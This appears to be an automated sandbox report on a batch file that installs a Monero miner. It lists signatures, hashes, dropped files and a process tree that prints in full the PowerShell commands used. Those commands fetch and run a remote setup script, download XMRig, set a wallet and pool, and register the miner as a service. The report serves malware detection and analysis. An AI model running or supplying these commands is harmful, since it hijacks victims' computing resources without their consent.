Analysis

  • max time kernel
    149s
  • max time network
    106s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-06-2024 16:20

General

  • Target

    vers1.bat

  • Size

    393B

  • MD5

    ece9925dc634f1cc20e3fd7ff7a144bd

  • SHA1

    8816112e72b7b64a668bf7214999d855a7e05bde

  • SHA256

    a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

  • SHA512

    bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 15 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 3 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 54 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4FF5.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4684
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:1376
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:4832
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:4868
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:3544
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:2080
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:1456
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:968
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:4504
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4772
                    • C:\Windows\system32\timeout.exe
                      timeout 5
                      4⤵
                      • Delays execution with timeout.exe
                      PID:4688
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4780
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1472
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1460
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                      • Executes dropped EXE
                      PID:4548
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4856
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3580
                        • C:\Windows\system32\HOSTNAME.EXE
                          "C:\Windows\system32\HOSTNAME.EXE"
                          6⤵
                            PID:3864
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2436
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4700
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ublnjrhf\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1612
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1448
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3508
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3632
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:988
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2408
                      • C:\Windows\system32\sc.exe
                        sc stop moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:2428
                      • C:\Windows\system32\sc.exe
                        sc delete moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:3560
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:5100
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                        4⤵
                        • Executes dropped EXE
                        PID:1860
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                        4⤵
                        • Executes dropped EXE
                        PID:2700
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                        4⤵
                        • Executes dropped EXE
                        PID:2292
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                        4⤵
                        • Executes dropped EXE
                        PID:3900
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                        4⤵
                        • Executes dropped EXE
                        PID:1968
                • C:\Users\Admin\moneroocean\nssm.exe
                  C:\Users\Admin\moneroocean\nssm.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3608
                  • C:\Users\Admin\moneroocean\xmrig.exe
                    "C:\Users\Admin\moneroocean\xmrig.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:2440
                • C:\Windows\system32\taskmgr.exe
                  "C:\Windows\system32\taskmgr.exe" /0
                  1⤵
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:956

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  5f4c933102a824f41e258078e34165a7

                  SHA1

                  d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

                  SHA256

                  d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

                  SHA512

                  a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  e585e24edd45aa9ad7c8345c4f2625ce

                  SHA1

                  a2e47ad56f6629018c11207bf61ae46bc7c2ea61

                  SHA256

                  f20968628e25c120e675d64ef596cd6dc33709d1e07f10a0a19d672e8f7f6b0b

                  SHA512

                  37b45dcaac23d1d5542e0b2251bba2b28e7cdebab0e5077e75f427b85d9d6e8fb61348445f4bfe487251aea25c063f0634d474c2896328b56406ee41ccb663e6

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  3d24ee7706a2ca48bb579baeb969501f

                  SHA1

                  431fec5f67ff8d36f400cd6af727fc526debc7c9

                  SHA256

                  e09febd2ab7f643e230292f85757a779ff5de3ba7673405c228f213de4040516

                  SHA512

                  98c52f06707cfa67cae135a64fcf1588155e956abae02ae352c657f8f58960f63ff6cabc93fc31d65398c037e828fab5fbbd2ba2bffd9b0261c835afeb2aaac6

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b68dd937b1b5e11650005fe38786e4df

                  SHA1

                  bc269d0d8aa32cce7423a2427e0a13b4b493d02d

                  SHA256

                  d59db858e6d8b02cca7fd5babceb86464a55fd60e185a4d30cd1e5f3659c0d8d

                  SHA512

                  3b47925701de389e62f3824da00c6f31feda6249fbd9111f48fe88da6a48a67b76814e8cd798145d3187ce709bd1b96cea0ee7693221540a5650e8651f245137

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  1347c156d2e4ab0ed51d96a2ec7a5f84

                  SHA1

                  b589b3d9589a877f8b311b0b07b5b2999a12f109

                  SHA256

                  dc570266df593f72a0e35061bdcdc39b34d6cae41cfdcaa6717f0920e06cdabc

                  SHA512

                  efedfce51ed08c522e1d5a658ac30f50cd02c5b3db6198ba9ebee5a4a87f83694fc890f3fe5c7571856a29df4fa8d3001f8a9afbbc1b8706261e02a1cfc5dd2b

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  4c3ab3b71ad9855f1a4755a435fd48bc

                  SHA1

                  c1630f113f69ff0495993d85368faab8060a9adb

                  SHA256

                  a8529957813fe437bcc74ed3636838ba1b4a7e737b8dadc59fa032e97145ad40

                  SHA512

                  12ce7b8f79c20eb83be33fea73f75fb6d157b0a9a44f704c231bc044bdc74201f21e5d903f2ace1f6c4982d2facd9d51d951527eb49b573cebb9f1f4bd9e5865

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  8558bb37a37a92e0363e766c41d2bc25

                  SHA1

                  b9c23a0837c0f196e84ca32a1eeeb9b1bd3235de

                  SHA256

                  576d44077855f73f0772834f21ac78dd077351454b8d5da171d2cdfc2d1595a5

                  SHA512

                  f8fbee69b4b614cd0538970e8148709fceb37728be7fa1e00d45d68b0ed76aadb30be95f09c21a127bb6aa4a7ac0a54e8b7fbdba88932beafb15c927d4028a83

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  17a60c9cac37cf5412f4cd266c22a435

                  SHA1

                  648aed53b8f323be19dfb75e1c61e9dd95fdd0fd

                  SHA256

                  de36be11adf1651810ebee5d6214786e3a6045ac7ee51730036385f504d4653d

                  SHA512

                  43c8160d5e32d6aeae36201e7580dfd2d47b53ceba28443b2aedefd32377448296ce805669b5136686378603af1348d58fb40a59b906c28aed2df6f7d98b4044

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  3201ac12f854ef86c3de884fd541111c

                  SHA1

                  628cd4f11b4b9fd87bc66c196a8d8ea4afd03dc3

                  SHA256

                  a035559e1a45856982b07ffb1d11beb93caf5f2135047681145ed03b7ea0ddd2

                  SHA512

                  5e66ef5cad697a5e4f76d4763bf6d0d2badf0c36717f040d78b092ec495bacaff600b40b9b8b3bb3287ee255245e7271bb133a6b75ef15fb2eabd7737a1b475b

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  fd34cfd5d70ae974c5166b0f31175c64

                  SHA1

                  a352515ee08f788a6ffeaf16a07c10dd152844a3

                  SHA256

                  48ceadc4e0b8f27f149254f1f6f02b426479b48c3b192ddf0b73f25faccc5a45

                  SHA512

                  89da22e599f7608de771354eca7025d044b1544c5b239a0ffac98fd39fcd8cc25277cf84df843f7155207a6bbdd1aca7b244ff45ff16d0371f32499544ed5ba6

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  8a424e81b5a6078deff05e153c04a0ee

                  SHA1

                  bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

                  SHA256

                  79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

                  SHA512

                  aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  71de3d4e6a902c41e5d87b031a5a1910

                  SHA1

                  38da8e3af858eb6ad51af0aca573ed73c244cb21

                  SHA256

                  19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

                  SHA512

                  c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_evncepo3.dlv.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\tmp4FF5.tmp.bat

                  Filesize

                  14KB

                  MD5

                  012a668bd1043d6b0a4bcd03d02ded41

                  SHA1

                  8595831d19a06d5ad38cb38b793eb1bdcc16b816

                  SHA256

                  57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

                  SHA512

                  e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  64cafb884608c751a2bccaca7c582e0f

                  SHA1

                  924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

                  SHA256

                  3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

                  SHA512

                  ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  a0e30d46de5dee82c2f40d05b70d0508

                  SHA1

                  52167d372e22f380a11b46c8c73f616315dc0666

                  SHA256

                  47359f2530dea19c6b45fa2b9fd54624844ddd27a61e6d96e3d9212371f4d9f3

                  SHA512

                  7bc9ded76a988cbe91bc9c0166659f5a2ad2ab9ef84a6a962ff1074fa00a2a4e0ec813d31a330d11b0ba8818fa316bbdd2e63e14b5204b643feb7518961cb7a1

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  39a6a81ebd0ff3656d7c9da1f4bbac38

                  SHA1

                  41c3473f7bed0f3521e9fe118bedf4eedc7cd20a

                  SHA256

                  25761c9f03b97d7c7cab6a06e23b51490da3ffc38fd5292714ce96125721ca30

                  SHA512

                  d1db3090a2b262c8241395cbb7bf3312e19bcac031bd9ee1069e197f231b28c24efa0a3e4afa9bcf31f4afc8ba7647d725746d31e95e856b052a5ff879e66b7b

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  38d6783b507ed48120e0715978ef7471

                  SHA1

                  1e155f6e92d712a4d896c1798e5348157324c092

                  SHA256

                  5f1daed80f84041757c4e195feddeac65e3eb173f6102b9be943a74989925ecf

                  SHA512

                  7871316413a54d23abc9ae65b59d6e6b9ae24c489639122534c3d92fe4b2b69ec2fe0f518606e02f7257917ecf2a99887e5a7ac68dc3947c890948b15e7ba73c

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  d4f8a13f8c90e2b3b2e7d30a553df39c

                  SHA1

                  5c5303ef682ffcd31e57d1abd900ba5b637d51e4

                  SHA256

                  f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

                  SHA512

                  68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  c9ef9c214996db3d88f571226910c5d5

                  SHA1

                  420ba30247b1e09f706557a7704a1ebee5d3165c

                  SHA256

                  fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

                  SHA512

                  de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

                • C:\Users\Admin\moneroocean\config.json

                  Filesize

                  2KB

                  MD5

                  725d38d9eeadc9c2691063936b01f9ec

                  SHA1

                  153fd5bd55cfd845516562291a7ab867d68145b5

                  SHA256

                  0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

                  SHA512

                  fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

                • C:\Users\Admin\moneroocean\nssm.exe

                  Filesize

                  360KB

                  MD5

                  1136efb1a46d1f2d508162387f30dc4d

                  SHA1

                  f280858dcfefabc1a9a006a57f6b266a5d1fde8e

                  SHA256

                  eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

                  SHA512

                  43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

                • C:\Users\Admin\moneroocean\xmrig.exe

                  Filesize

                  9.0MB

                  MD5

                  9ee2c39700819e5daab85785cac24ae1

                  SHA1

                  9b5156697983b2bdbc4fff0607fadbfda30c9b3b

                  SHA256

                  e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

                  SHA512

                  47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

                • C:\Users\Admin\nssm.zip

                  Filesize

                  135KB

                  MD5

                  7ad31e7d91cc3e805dbc8f0615f713c1

                  SHA1

                  9f3801749a0a68ca733f5250a994dea23271d5c3

                  SHA256

                  5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

                  SHA512

                  d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

                • C:\Users\Admin\xmrig.zip

                  Filesize

                  3.5MB

                  MD5

                  640be21102a295874403dc35b85d09eb

                  SHA1

                  e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

                  SHA256

                  ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

                  SHA512

                  ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

                • memory/956-211-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-208-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-209-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-210-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-199-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-205-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-207-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-206-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-201-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/956-200-0x000002BDADB70000-0x000002BDADB71000-memory.dmp

                  Filesize

                  4KB

                • memory/1472-40-0x000002E3F2CF0000-0x000002E3F2D02000-memory.dmp

                  Filesize

                  72KB

                • memory/1472-39-0x000002E3DA8D0000-0x000002E3DA8DA000-memory.dmp

                  Filesize

                  40KB

                • memory/2440-192-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-214-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-212-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-193-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-194-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-195-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-215-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-213-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-190-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-189-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-188-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/2440-191-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/4548-64-0x0000000001290000-0x00000000012B0000-memory.dmp

                  Filesize

                  128KB

                • memory/4548-65-0x0000000000400000-0x000000000102B000-memory.dmp

                  Filesize

                  12.2MB

                • memory/4984-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4984-17-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4984-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

                  Filesize

                  8KB

                • memory/4984-16-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp

                  Filesize

                  8KB

                • memory/4984-12-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4984-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4984-198-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmp

                  Filesize

                  10.8MB

